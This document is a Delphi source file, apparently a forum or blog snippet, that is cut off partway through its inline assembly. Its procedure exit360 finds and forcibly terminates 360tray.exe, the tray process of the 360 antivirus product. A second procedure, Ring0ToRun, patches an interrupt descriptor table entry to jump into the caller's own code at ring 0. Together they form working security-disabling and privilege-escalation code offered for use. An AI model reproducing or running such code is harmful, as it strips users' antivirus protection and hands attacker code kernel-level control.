Delphi 嵌入汇编 进Ring0 360tray.exe

unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, TlHelp32;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
procedure exit360;
procedure Ring0ToRun; stdcall;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure exit360;
var
id:Cardinal;
sn:THandle;
boo:Boolean;
lpp:TProcessEntry32;
phand:HWND;
begin
sn:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
lpp.dwSize:=SizeOf(lpp);
try
boo:=Process32First(sn,lpp);
while boo do
begin
if lpp.szExeFile = '360tray.exe' then
begin
//Result:=lpp.szExeFile;
id:=lpp.th32ProcessID;
phand:=OpenProcess(PROCESS_ALL_ACCESS,False,id);
GetWindowThreadProcessId(phand,id);
TerminateProcess(phand,ExitCode);
Break;
end;
boo:=Process32Next(sn,lpp);
end;
except
end;
end;
procedure Ring0ToRun; stdcall;
const
ExceptionUsed = $03; // 中断号,也可以用其他的中断号，如$05等
var
IDT:array [0..5] of byte; //保存中断描述符表，6字节
lpOldGate : DWORD; // 保存旧的中断向量，8个字节
begin
asm
sidt IDT //读入中断描述符表至IDt中
mov ebx, dword ptr [IDT+2] //IDT共6字节，第2~5字节是中断描述符表的基地址，基地址存入ebx中
add ebx, 8*ExceptionUsed //加上8x3个字节，因为每个中断向量占用8字节，
cli //关中断，下面的代码是关键代码，不允许打断
mov dx, word ptr [ebx+6] //取中断向量的6，7字节
shl edx, 16d //左移16位，中断向量的6，7字节存入edx的高32位
mov dx, word ptr [ebx] //取中断向量的0，1字节，存入edx低32位
mov [lpOldGate], edx //保存中断向量至lpoldgate中
mov eax, offset @@Ring0Code //修改向量，指向Ring0级代码段
mov word ptr [ebx], ax
shr eax, 16d
mov word ptr [ebx+6], ax
int ExceptionUsed // 发生中断，自动以ring0执行@@Ring0Co